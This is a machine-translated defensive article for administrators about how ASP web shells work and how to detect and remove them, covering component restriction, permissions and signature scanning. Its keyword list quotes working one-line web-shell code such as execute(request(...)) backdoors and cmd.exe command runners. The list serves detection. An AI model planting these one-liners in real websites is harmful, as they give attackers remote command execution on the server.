The principle and basic precaution method of ASP Trojan Horse

ASP Trojan rampant, based on the ASP site is always in danger, to make the site security at any time to be protected, need our server administrator to do what, how to prevent ASP Trojan? To prevent ASP Trojan, then we need to know its operating principles and mechanisms, the following we look at a piece of code:

Set oscript = Server.CreateObject("Wscript.SHELL")"Creates a Wscript.Shell object named Oscript for command execution."

Set oscriptNet = Server.CreateObject("Wscript.NETWORK")
Set oFileSys = Server.CreateObject("scripting.FileSystemObject")

The above three lines of code create Wscript.Shell, Wscript.Network, scripting. FileSystemObject three objects we can see that the ASP Trojan running principle is through the invocation of component objects and so on.

Through the analysis of some ASP trojan, we see that the main is run through 3 components, the first is we know the FSO, need FSO support is also "scripting." FileSystemObject "Support, then some people will say, is not to delete this component can ah, can not, because now many programs are to use the FSO this component, so it is not limited to the normal program can not run, now there are many tutorials online, Tell others to delete or limit use, these methods are very extreme, I do not recommend that you use, we say that several other components, "shell.application", "Wscript.Shell" and other dangerous components, the general Trojan is to use these several components, Even if you limit the FSO components, you do not have to limit the other components, the same can not be effective, for the FSO component of several other components, we usually do not use, so we can directly in the registry in the HKEY_CLASSES_ROOT to find

Find the "Shell.Application", "Wscript.Shell" and other dangerous script objects (because they are used to create a script command channel) to rename or delete, that is, restricting the system to "script Shell" creation, ASP Trojan is also become a non-existent, Bricks without straw, it's not working. If we want to use, then we do not delete directly change the name, if it is renamed, to change a little more complex, do not let others guess, we have to use the program directly to change the name of the call we have just modified the name on it.

After restricting the components, we should also strictly set the permissions on the server. Here I will not say, due to the length of the problem, I do not know how long to write, we can refer to some of the Internet security permission settings, we have set the permissions and components, and so on, basically can prevent the harm of ASP Trojan.

Another point should be noted, if you do find a trojan, after killing, should have administrative rights of all types of accounts are modified. Including the Forum's account number, database account number and server operating system account, FTP account, etc., if we do this a few words, our server is basically safe, oh, why is the basic, because the world does not have a secure server, Just the setting we just mentioned is able to prevent most of the ASP Trojan attack, do not rule out some other factors, such as lifting limits. In plain defense ASP Trojan is to restrict components, set strict permissions and ensure the security of ASP programs

We say below how to kill ASP Trojan, I according to own some experience said several methods

1. Time Comparison method

In chronological order to find the latest changes in the ASP file, open look, is not a trojan, what, do not understand the code, then you put the ASP file is not your own, the name of a look at a glance out. For example, what diy.ap.dm6.asp,angel.asp.shell.asp files, suspicious ASP files are not created by yourself Delete, or direct access under the look is not a trojan can be

2. Find the keyword, ASP trojan is a keyword, also like the signature of the virus, we use Windows with the search function can be found, to find the content as the keyword of all the files can be found in the future can be looked at, and sometimes can find some of the large ASP files, If it is a virtual host, it is generally the database file changed to ASP, if it is a word Trojan key word on the careful, if it is a large Trojan keyword, we visit to see, I do not agree to the database to the ASP, as for why, we all know it.

I've sorted out some signatures, and now for everyone

gxgl
lcx
<script RUNAT=SERVER LANGUAGE=JAVAscript>eval(Request.form(’#’)+’’)</script>
输入马的内容
session("b")
request("kker")
非常遗憾,您的主机不支持ADODB.Stream,不能使用本程序
传至服务器已有虚拟目录
警告:对非法使用此程序可能带来的任何不良后果责任自负!请勿用于非法用途!!!
<%execute request("value")%>
ccopus<
<%execute(request("＃"))%>
<script language="vbscript" runat=server>if reques(＃")<>"" then execute(request("＃"))</script>
("cmd.exe /c "&request.form("cmd")).
("cmd.exe /c "&request("cmd")).
("cmd.exe /c "&request("c")).

These are the key words, all of me from a trojan inside a extracted, if there are these characteristics, generally are Trojans, but we'd better open look, do not exclude special circumstances. If your site, there are similar code: <iframe src= "http://www.***.com" ></iframe> estimate may be joined by a malicious connection, or to be hanged horse, good vicious, then please search the keyword in the IFRAME Src

3. You can also use the Ming Kid's ASP Trojan scan this gadget pull, put my key words in, scan, quite convenient, hehe

4. In the structure of the site clearly, browse directory method can quickly determine the trojan, in the wrong place to appear in the file, tube he is not a trojan can be deleted, such as Dvbbs under the Upfile these folders should not appear in ASP files, we found on the deletion is a, However, administrators are required to be familiar with their site directory structure

5. There is a way to try, is to do a backup, once found that someone invaded, immediately restore, so what Trojan is not afraid of, but to note that the guarantee backup files are safe, if the backup file there are Trojans, so that there is no one to do the same

6. Use ASP Trojan Hunt files, killing, online download, in addition to our commonly used anti-virus software also has such a function, I recommend that you use Cabas machine, the effect is very good, can almost kill today all the popular ASP Trojan

The above is simply introduced a bit, ASP Trojan some killing methods, of course, these are just dead to make up, we'd better have strict permissions on the server system, so that hackers even upload a trojan is not what to use, where the restrictions on the permissions I do not know how much to write, the information on the Internet is also very comprehensive, We can find the west by ourselves. And now all the same, ASP Trojan hidden method is really very smart, ASP Trojan code encryption, picture merging, file time modification, there are deadly system loopholes and so on to the killing of the ASP Trojan, almost impossible, we only blocked the source of the Trojan upload, ASP program as far as possible with the latest version, the way to upload the site itself should pay special attention to the folder does not need to run the script in IIS settings, the implementation of the license for none, there is the administrator to require a good sense of security, otherwise, it is not safe, and we set the right, the biography is also a white biography.